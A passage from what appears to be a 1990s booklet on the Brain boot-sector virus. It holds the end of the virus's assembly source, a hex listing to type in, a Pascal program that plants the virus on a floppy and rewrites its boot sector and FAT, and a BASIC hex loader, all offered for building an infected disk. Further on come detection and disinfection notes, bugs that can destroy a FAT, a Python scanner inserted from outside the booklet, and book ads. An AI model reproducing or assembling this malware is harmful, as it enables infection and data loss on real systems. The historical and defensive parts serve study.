        CMP     BYTE PTR DS:CURR_HEAD,2 ;is head 2 yet?
        JNE     NS_DONE                 ;no, all done
        MOV     BYTE PTR DS:CURR_HEAD,0 ;yes, set it to 0
        INC     BYTE PTR DS:CURR_SECCYL+1 ;And increment cylinder ctr
NS_DONE: RET

NEXT_SECTOR ENDP
;******************************************************************************

        DB      64H,74H,61H

;******************************************************************************

DISK_BUFFER DW  1CEBH                   ;buffer for reading disk
        DW      4990H

RBRAIN_ID DW    4D42H                   ;RAM BRAIN boot sector ID
RSTART_HEAD DB  20H                     ;RAM based drive head
RSTART_SECCYL DW 3420H                  ;sector and cylinder

        DB      2EH,30H,0,2,2

;******************************************************************************
;This is the start of the BRAIN boot sector.
        ORG     7C00H

MEM_SIZE EQU    413H

BRAIN PROC NEAR
        CLI                             ;Turn OFF Interrupts
        JMP     NEAR PTR START

;******************************************************************************

BRAIN_ID DW     1234H
START_HEAD DB   0
START_SECCYL DB 7,0DH
HEAD_NO DB      0
SECTOR_NO DB    1
CYL_NO  DB      0
        DB      0,0,0,0

        DB      'Welcome to the Dungeon (c) 1986 Brain'
        DB      17H
        DB      '& Amjads (pvt) Ltd VIRUS_SHOE RECORD '
        DB      'v9.0 Dedicated to the dynamic memories of millions '
        DB      'of virus who are no longer with us today - Thanks '
        DB      'GOODNESS!! BEWARE OF THE er..VIRUS : '
        DB      '\this program is catching program '
        DB      'follows after these messeges..... $#@%$@!! '

;******************************************************************************
START:  MOV     AX,CS
        MOV     DS,AX
        MOV     SS,AX                   ;ss=ds=cs=0
        MOV     SP,0F000H               ;set up stack
        STI                             ;Turn ON Interrupts
        MOV     AL,[START_HEAD]         ;starting head number for read
        MOV     [HEAD_NO],AL
        MOV     CX,WORD PTR [START_SECCYL]
        MOV     WORD PTR [SECTOR_NO],CX
        CALL    NXT_SECTOR              ;set params for next disk sector



        MOV     CX,5                    ;Virus has 5 more sectors
        MOV     BX,7E00H                ;Load remainder of virus here
LOAD_VIRUS:
        CALL    READ_DISK               ;Read a sector from disk
        CALL    NXT_SECTOR              ;set params for next disk sector
        ADD     BX,200H                 ;move buffer for next sector
        LOOP    LOAD_VIRUS              ;Dec CX;Loop if CX>0
        MOV     AX,WORD PTR DS:[MEM_SIZE] ;Size of memory in kilobytes
        SUB     AX,7                    ;Decrement it by 7
        MOV     WORD PTR DS:[MEM_SIZE],AX
        MOV     CL,6
        SHL     AX,CL                   ;Convert resultant into seg @
        MOV     ES,AX                   ;And set es up with that segment
        MOV     SI,7C00H                ;Move this sector and the rest
        MOV     DI,0                    ;Up to high memory
        MOV     CX,1004H
        CLD                             ;Forward String Opers
        REP     MOVSB                   ;Mov DS:[SI]->ES:[DI]
        PUSH    ES                      ;Prepare for control transfer
        MOV     AX,200H                 ;to offset 200 (first of the
        PUSH    AX                      ;hidden sectors)
        RETF                            ;Go to high memory
BRAIN ENDP

;Read a sector from disk. This preserves bx and cx
READ_DISK PROC NEAR
        PUSH    CX
        PUSH    BX
        MOV     CX,4                    ;Retry count
READ_LOOP:
        PUSH    CX
        MOV     DH,[HEAD_NO]
        MOV     DL,0
        MOV     CX,WORD PTR [SECTOR_NO]
        MOV     AX,201H
        INT     13H                     ;read sector, into ES:BX
        JNB     READ_IS_OK              ;No error, so continue
        MOV     AH,0                    ;Attempt to reset if an error
        INT     13H                     ;DSK:00-reset, DL=drive
        POP     CX
        LOOP    READ_LOOP               ;Dec CX;Loop if CX>0
        INT     18H                     ;Go to ROM if retries expired
READ_IS_OK:
        POP     CX
        POP     BX
        POP     CX
        RET
READ_DISK ENDP

;Set params for next disk sector read
NXT_SECTOR PROC NEAR
        MOV     AL,[SECTOR_NO]          ;increment sector number
        INC     AL
        MOV     [SECTOR_NO],AL
        CMP     AL,0AH                  ;is sector=10?
        JNE     NSDONE                  ;if not, all done
        MOV     [SECTOR_NO],1           ;yes, set sector=1 now
        MOV     AL,[HEAD_NO]            ;increment head count
        INC     AL
        MOV     [HEAD_NO],AL
        CMP     AL,2                    ;is it 2 yet?
        JNE     NSDONE                  ;if not, all done
        MOV     [HEAD_NO],0             ;yes, set head = 0
        INC     [CYL_NO]                ;and increment cylinder number
NSDONE: RET
NXT_SECTOR ENDP

;******************************************************************************
        DB      0,0,0,0,32H,0E3H
        DB      23H,4DH,59H,0F4H,0A1H,82H
        DB      0BCH,0C3H,12H,0,7EH,12H
        DB      0CDH,21H,0A2H,3CH,5FH,0CH,5

VIRUSEG ENDS
        END     COM_START



8. The Hex Listing

The following is an assembled HEX listing of the virus. It can be typed in, and loaded using a HEX loader such as the one in Appendix A in this note. This results in a binary COM file which can then be placed on a floppy disk using the Virus Loader PUTBRAIN described in Section 9.







:107BF000722E2E564952555320203A205C746869E3
:107C0000732070726F6772616D2069732063617495
:107C10006368696E6720202020202070726F677271
:107C2000616D20666F6C6C6F77732061667465722E
:107C3000207468657365206D657373656765732E61
:107C40002E2E2E2E202423402524402121208CC896
:107C50008ED88ED0BC00F0FBA0067CA2097C8B0ED7
:107C6000077C890E0A7CE85700B90500BB007EE856
:107C70002A00E84B0081C30002E2F4A113042D079F
:107C800000A31304B106D3E08EC0BE007CBF000089
:107C9000B90410FCF3A406B8000250CB5153B90448
:107CA00000518A36097CB2008B0E0A7CB80102CDE5
:107CB000137309B400CD1359E2E7CD18595B59C3CA
:107CC000A00A7CFEC0A20A7C3C0A751AC6060A7C81
:107CD00001A0097CFEC0A2097C3C027509C6060908
:107CE0007C00FE060B7CC30000000032E3234D59EC
:107CF000F4A182BCC312007E12CD21A23C5F0C0510
:00000001FF

9. The Virus Loader

The following program, PUTBRAIN, is a Turbo Pascal program to put the Brain virus on a 360K floppy disk. To use it, simply place it in the same directory as BRAIN.COM, as assembled from Section 7, or loaded from Section 8, and execute PUTBRAIN. PUTBRAIN essentially mimics the virus’ infection routine. It locates an open space on the disk and puts the main body of the virus there, along with the original boot sector on the disk. It overwrites the boot sector with the viral boot sector, and finally marks the clusters where the Brain resides as bad in the FAT table.

program put_brain_to_a;

uses dos;

var
  diskbuf       :array[0..32767] of byte;
  cyl,hd,sec    :byte;
  sc,sh,ss      :byte;
  start_cluster :word;
  brain         :file;

procedure increment(var c,h,s:byte);
begin
  s:=s+1;
  if s>9 then
    begin
      s:=1;
      h:=h+1;
      if h>1 then
        begin
          h:=0;
          c:=c+1;



        end;
    end;
end;

procedure read_sectors(c,h,s,n:byte);
var
  o :word;
  r :registers;
begin
  o:=0;
  repeat
    repeat
      r.ah:=2;
      r.al:=1;
      r.bx:=ofs(diskbuf[o]);
      r.es:=seg(diskbuf);
      r.dh:=h;
      r.dl:=0;
      r.ch:=c;
      r.cl:=s;
      intr($13,r);
    until r.flags and 1 = 0;
    n:=n-1;
    o:=o+512;
    increment(c,h,s);
  until n=0;
end;

procedure write_sectors(c,h,s,n:byte);
var
  o :word;
  r :registers;
begin
  o:=0;
  repeat
    repeat
      r.ah:=3;
      r.al:=1;
      r.bx:=ofs(diskbuf[o]);
      r.es:=seg(diskbuf);
      r.dh:=h;
      r.dl:=0;
      r.ch:=c;
      r.cl:=s;
      intr($13,r);
    until r.flags and 1 = 0;
    n:=n-1;
    o:=o+512;
    increment(c,h,s);
  until n=0;
end;

procedure init_disk;
var
  r :registers;
begin
  r.ah:=0;
  r.dl:=0;
  intr($13,r);
end;

function cluster_entry(cl:word):word;
var
  a :word;
begin
  if odd(cl) then
    begin
      cl:=(cl*3) div 2;
      cl:=diskbuf[cl]+256*diskbuf[cl+1];
      cl:=(cl and $FFF0) shr 4;
    end
  else



    begin
      cl:=(cl*3) div 2;
      cl:=diskbuf[cl]+256*diskbuf[cl+1];
      cl:=cl and $0FFF;
    end;
  cluster_entry:=cl;
end;

procedure mark_cluster(cl,val:word);
begin
  if odd(cl) then
    begin
      cl:=(cl*3) div 2;
      diskbuf[cl]:=(diskbuf[cl] and $0F)+$70;
      diskbuf[cl+1]:=$FF;
      diskbuf[cl+$400]:=diskbuf[cl];
      diskbuf[cl+$401]:=diskbuf[cl+1];
    end
  else
    begin
      cl:=(cl*3) div 2;
      diskbuf[cl]:=$F7;
      diskbuf[cl+1]:=(diskbuf[cl+1] and $F0)+$0F;
      diskbuf[cl+$400]:=diskbuf[cl];
      diskbuf[cl+$401]:=diskbuf[cl+1];
    end;
end;

function find_fat_space:word;
var
  clust_count :word;
  sc          :word;
begin
  sc:=$37;
  clust_count:=0;
  repeat
    if cluster_entry(sc)=0 then
      begin
        sc:=sc+1;
        clust_count:=clust_count+1;
      end
    else
      begin
        sc:=sc+1;
        clust_count:=0;
      end;
  until clust_count=3;
  sc:=sc-3;
  find_fat_space:=sc;
end;

procedure mark_fat_bad(clust:word);
var
  j :word;
begin
  for j:=0 to 2 do mark_cluster(start_cluster+j,$FF7);
end;

procedure setup_virus_location;              {set up cyl,hd,sec from start_cluster}
begin
  start_cluster:=((start_cluster-3)*2)+12;   {Get absolute sector number}
  cyl:=start_cluster div 18;                 {Compute cylinder}
  sec:=(start_cluster-18*cyl)+1;
  hd:=0;
  if sec>9 then
    begin
      hd:=1;
      sec:=sec-9;
    end;
  writeln(cyl,' ',hd,' ',sec);
end;



begin
  init_disk;
  read_sectors(0,0,2,4);                     {Read FAT tables in}
  start_cluster:=find_fat_space;
  mark_fat_bad(start_cluster);
  write_sectors(0,0,2,4);                    {Write FAT tables back out}
  setup_virus_location;                      {Calculate cyl,hd,sec}
  sc:=cyl;
  sh:=hd;
  ss:=sec;
  read_sectors(0,0,1,1);                     {Read the real boot sector}
  write_sectors(cyl,hd,sec,1);               {And put it here}
  increment(cyl,hd,sec);                     {Go to next sector}
  assign(brain,'BRAINEXT.COM');
  reset(brain,32000);
  blockread(brain,diskbuf,1);
  close(brain);
  move(diskbuf[$100],diskbuf[0],2048);
  write_sectors(cyl,hd,sec,3);
  move(diskbuf[$7B00],diskbuf[0],512);
  diskbuf[6]:=sh;
  diskbuf[7]:=ss;
  diskbuf[8]:=sc;
  write_sectors(0,0,1,1);
end.

10. Notes on Variations

There are a number of varieties of the Brain floating around. As with any virus, it is difficult to track those varieties down, since they don’t normally come with press releases announcing a new version, and because the anti-virus researchers name the same varieties different things, and different varieties the same thing.

The original Brain was somewhat unique, as it supposedly contained the name and address of the authors:

Brain Computer Services
730 Nizam Block
Allama Iqbal Town
Lahore
Pakistan

hence the name, Pakistani Brain. I have, however, written to this address and obtained no response.

As far as I can tell, there are two versions of Brain that will infect hard drives. One is also known as the Houston virus, and one is a variant of the Ashar. There are also supposedly versions that do not put the “(c) Brain” label on the disk. There is also a nasty hacked version called Clone which will destroy your FAT after May 5, 1992. There is also a so-called Nipper virus which is a minor modification of the Brain.

There are a number of variants of the Ashar modification of the Brain which is detailed in this booklet. There is a species labelled version 9.0 which will infect hard drives, in addition to the version 9.0 discussed in this booklet, which does not. There is also evidently a version 9.1 which



also does not infect hard drives. Of course nobody knows where versions 1 to 8 are.

A lot of these reports are just hearsay. Since there is no library of viruses with free, public access, and since there is no library which actually solicits new versions from virus writers, nobody really knows how many different viruses there are out there, much less how to name them. I’ve seen claims of anywhere from one to eight thousand known viruses as of this writing. But the real number could be more like 25,000, judging from the fact that most of the viruses I’ve found in the wild haven’t been properly cataloged by anybody.

11. Detection and Disinfection

The Brain is fairly easy to detect and get rid of, even though it is a so-called stealth virus. If your system is infected, the virus will be stealing memory away from DOS, and you can see it using CHKDSK.

When your system boots up, it counts through available memory. Find out how much base memory it has. This will usually be 640K, but it could be less, like 512K. (We’re not talking about extended memory here!) Now take that number and multiply by 1024 to get the total bytes of free memory available. For example, 640 x 1024 = 655,360 bytes. If you are infected by the Brain, or any boot sector virus which uses a similar technique to go memory resident, and you run CHKDSK (do not use /F!), it will report a total bytes memory somewhat less than this. This particular version of Brain takes up 7K, so on a 640K machine, one will find 648,192 total bytes instead of 655,360. This is a clue that the virus is resident in memory.

The obvious way to find the virus on a disk is to look at the labels on your disks. Do a directory, and if the label reads “(c) Brain”, then that disk is infected. Be careful, though: the PUTBRAIN program creates an infected disk with no label, and if you format a disk with Brain resident, you can also get a disk with no label, because FORMAT writes the root directory after Brain has infected the disk (when the boot sector is written).

The fool-proof way to detect an infection is to boot from a known clean disk and examine the boot sector of questionable disks with a utility such as PC Tools, Xtree, or Norton. Then you will see the Brain’s infamous “Welcome to the dungeon”, copyright and warnings in the boot sector. Of course, this procedure could easily be automated to develop your own scanner for the Brain.
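The automated boot-sector check suggested above, together with the CHKDSK arithmetic from earlier in this section, as an added Python example that is not part of the booklet: it scans a raw floppy image for the two text strings the text names and computes the memory shortfall CHKDSK would show. The string offsets and the four-sector image are constructed for the demonstration and are not the real Brain layout.

```python
SECTOR_SIZE = 512

# Text the booklet says appears in the viral boot sector and volume label.
BRAIN_SIGNATURES = (b"Welcome to the dungeon", b"(c) Brain")


def find_signatures(image: bytes) -> list:
    """List (sector_number, signature) for each sector carrying Brain text.
    Sector 0 is the boot sector; hits elsewhere point at the sectors holding
    the rest of the virus (the ones Brain marks bad in the FAT)."""
    hits = []
    for start in range(0, len(image), SECTOR_SIZE):
        data = image[start:start + SECTOR_SIZE]
        for sig in BRAIN_SIGNATURES:
            if sig in data:
                hits.append((start // SECTOR_SIZE, sig.decode()))
    return hits


def boot_sector_infected(image: bytes) -> bool:
    """True when a Brain signature sits in the boot sector itself."""
    return any(num == 0 for num, _ in find_signatures(image))


def memory_shortfall_kb(base_kb: int, chkdsk_total_bytes: int) -> int:
    """KB missing from CHKDSK's 'total bytes memory' relative to base_kb.
    A clean machine reports base_kb * 1024 (640 x 1024 = 655,360); a resident
    boot-sector virus shows as a shortfall, 7 for the Brain in this booklet."""
    missing = base_kb * 1024 - chkdsk_total_bytes
    if missing < 0:
        raise ValueError("CHKDSK reports more memory than the machine has")
    return missing // 1024


def build_demo_image(infected: bool) -> bytes:
    """Constructed 4-sector image for the demo; not a real Brain layout."""
    boot = bytearray(SECTOR_SIZE)
    boot[0:3] = b"\xEB\x3C\x90"    # JMP SHORT, as a normal boot sector begins
    boot[510:512] = b"\x55\xAA"    # boot signature
    body = bytearray(SECTOR_SIZE)
    if infected:
        boot[0x60:0x76] = b"Welcome to the dungeon"   # 22 bytes
        boot[0xA0:0xA9] = b"(c) Brain"                # 9 bytes
        body[0x10:0x19] = b"(c) Brain"   # constructed: a copy in a later sector
    return bytes(boot) + bytes(SECTOR_SIZE) + bytes(body) + bytes(SECTOR_SIZE)
```

Run the scan against a clean image as well as an infected one; the clean image yields no hits and a shortfall of 0 K.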

To disinfect a disk infected with the Brain, you must first boot from a clean disk. Suppose the clean disk is in drive A, and the infected one is in drive B. Use the DOS command “SYS B:” to disinfect the disk in drive B. Even if the SYS command fails to load the operating system onto the disk, it will wipe the Brain out, because the first thing SYS does is overwrite the boot sector. As long as the virus is not resident in memory, SYS will overwrite the viral boot sector with a standard DOS boot sector. Although it will leave the “(c) Brain” label on the disk, and it won’t recover the sectors which were marked bad by Brain, it will have short-circuited Brain’s access to the CPU at boot time, and effectively killed the virus.

To disinfect Brain-infected disks when Brain is resident, see Section 12 for a way to use a bug in Brain to do this. However, this method is not recommended unless you simply have no choice (e.g. all of the disks you have access to are infected).

The easiest way to completely get rid of the Brain is to copy any needed files off the disk in question, and then reformat it. Remember to boot from a clean disk before you do any formatting, and don’t use the DOS 5.0 FORMAT program unless you know how to use it, because it doesn’t always really format a disk.

Obviously, one could write a more sophisticated clean-up program which would read the viral boot sector, calculate where the original boot sector is, move it back where it belongs, remove the disk label, and clean up the FAT to free up the sectors which Brain marked bad. Chances are, this is more trouble than it is worth though.

12. Bugs

I know of two bugs in the Brain. One is that it does not handle multiple sector reads correctly. If one attempts to read two sectors starting with the boot sector, one would expect to get the original boot sector and the first sector of the first FAT. Instead, one will get the original boot sector and the first sector of the main body of the virus. If the original boot sector is the last sector on a cylinder, one will get a disk read error. The bug results because the Brain just moves the start Cylinder/Sector/Head for the read. A multiple sector read requires something more complex, as in the Stealth virus in The Little Black Book of Computer Viruses.

The second bug is that the Brain does not handle reads and writes symmetrically. It redirects reads, but not writes. This bug can be used to kill the Brain in a system in which it is active in memory. Simply read the boot sector and then write it back out again. The read will be redirected to get the original boot sector, and the write will not be redirected, so the viral boot sector will be overwritten with the original, effectively killing the Brain on that disk. (You must remove the disk right away, though, or it will be re-infected!)


Alternatively, both bugs, working together, can cause some real damage. Read two sectors starting with the boot sector, as described above. Then write them back out. You just wrote a portion of virus code into your FAT, destroying it. Not too pretty. (This phenomenon will cause DISKCOPY to trash the copied disk, too, when Brain is resident.)

As a final note, in using interrupt 6DH for the redirected BIOS disk handler, the Brain occasionally proves incompatible with some types of BIOS. Changing that interrupt vector (BDSK_INT) in the source code will overcome that difficulty. Changing it to 6BH worked fine in the cases I uncovered. That may or may not work for you, though, if you experience this problem.

13. References

Ludwig, Mark A., The Little Black Book of Computer Viruses, Vol. 1, (American Eagle Publications: Tucson, Az) 1991, ISBN 0-929408-02-0

14. Appendix A: The Hex Loader

The following BASIC program, LOAD.BAS, will translate the HEX listing into a COM file. When the program runs, you will be prompted for both source and destination files. When asked for the source file name, enter the HEX file name, including the “HEX”, and do likewise for the destination COM file name. The program will create the COM file you specified from the HEX file. It can then be used with the loader to make an infected diskette.

10 PRINT "Source file";
20 INPUT SFNAME$
30 PRINT "Destination file";
40 INPUT DFNAME$
50 OPEN SFNAME$ FOR INPUT AS #1
60 OPEN DFNAME$ FOR RANDOM AS #2 LEN=1
70 FIELD 2, 1 AS O$
80 E=0
90 LINECT=0
100 IF EOF(1) THEN GOTO 160
110 LINE INPUT #1, S$
120 LINECT=LINECT+1
130 GOSUB 200
140 GOTO 100
150 IF E=1 THEN GOTO 170
160 PRINT "Translation complete."
170 CLOSE #1
180 CLOSE #2
190 END
200 REM THIS SUBROUTINE DECOMPOSES ONE LINE OF THE HEX FILE
210 H$=LEFT$(S$,3)
220 H$=RIGHT$(H$,2)
230 GOSUB 540
240 COUNT%=X%
250 CSUM%=COUNT%
260 H$=LEFT$(S$,7)
270 H$=RIGHT$(H$,4)
280 GOSUB 540
290 ADDR%=X%
300 CSUM%=CSUM%+(ADDR%\256)+(ADDR% AND 255)
310 H$=LEFT$(S$,9)
320 H$=RIGHT$(H$,2)
330 IF H$<>"00" THEN GOTO 160
340 FOR J%=1 TO COUNT%
350 H$=LEFT$(S$,9+2*J%)
360 H$=RIGHT$(H$,2)
370 GOSUB 500
380 CSUM%=CSUM%+X%
390 LSET O$=C$
400 PUT #2, ADDR%+J%
410 NEXT J%
420 H$=LEFT$(S$,11+2*COUNT%)
430 H$=RIGHT$(H$,2)
440 GOSUB 540
450 CSUM%=CSUM%+X%
460 IF (CSUM% AND 255) = 0 THEN RETURN
470 PRINT "Checksum error in line ";LINECT
480 E=1
490 GOTO 150
500 REM THIS SUBROUTINE CONVERTS A HEX STRING IN H$ TO A BYTE IN C$
510 GOSUB 540
520 C$=CHR$(X%)
530 RETURN
540 REM THIS SUBROUTINE CONVERTS A HEX STRING IN H$ TO AN INTEGER IN X%
550 X%=0
560 IF LEN(H$)=0 THEN RETURN
570 Y%=ASC(H$)-48
580 IF Y%>9 THEN Y%=Y%-7
590 X%=16*X%+Y%
600 H$=RIGHT$(H$,LEN(H$)-1)
610 GOTO 560


Come visit American Eagle Publications, Inc. to get the programs discussed here.


For security reasons, the programs distributed with this file are encrypted in ZIP format. To get them use the following password:

tn123ab

If you can’t figure out how to use ZIP and decrypt the files, do not call or email us. If you can’t do that, you’re too stupid to have any business touching these files anyhow.


Dr. Ludwig is back in black!

ISBN 0-929408-33-0, 232 pages, $16.95

In this brand new book, Dr. Ludwig explores the fascinating world of email viruses in a way nobody else dares! Here you will learn about how these viruses work and what they can and cannot do from a veteran hacker and virus researcher. Why settle for the vague generalities of other books when you can have page after page of carefully explained code and a fascinating variety of live viruses to experiment with on your own computer or check your antivirus software with? In this book you'll learn the basics of viruses that reproduce through email, and then go on to explore how antivirus programs catch them and how wily viruses evade the antivirus programs. You'll learn about polymorphic and evolving viruses. You'll learn how virus writers use exploits - bugs in programs like Outlook Express - to get their code to execute without your consent. You'll learn about logic bombs and the social engineering side of viruses - not the social engineering of old time hackers, but the tried and true scientific method behind turning a replicating program into a virus that infects millions of computers. Yet Dr. Ludwig doesn't stop here. He faces the sobering possibilities of email viruses that lie just around the corner . . . viruses that could literally change the history of the human race, for better or worse. Admittedly this would be a dangerous book in the wrong hands. Yet it would be more dangerous if it didn't get into the right hands. The next major virus attack could see millions of computers wiped clean in a matter of hours. With this book, you'll have a fighting chance to spot the trouble coming and avoid it, while the multitudes that are dependent on a canned program to keep them out of trouble will get taken out. In short, this is an utterly fascinating book. You'll never look at computer viruses the same way again after reading it.

ISBN 0-929408-34-9, 464 pages $34.95

The world of hacking changes continuously. Yesterday's hacks are today's rusty locks that no longer work. The security guys are constantly fixing holes, and the hackers are constantly changing their tricks. This new fourth edition of the Happy Hacker - just released in December, 2001 - will keep you up to date on the world of hacking. It's classic Meinel at her best, leading you through the tunnels and back doors of the internet that is accessible to the beginner, yet entertaining and educational to the advanced hacker. With major new sections on exploring and hacking websites, and hacker war, and updates to cover the latest Windows operating systems, the Happy Hacker is bigger and better than ever!

Order from www.ameaglepubs.com today!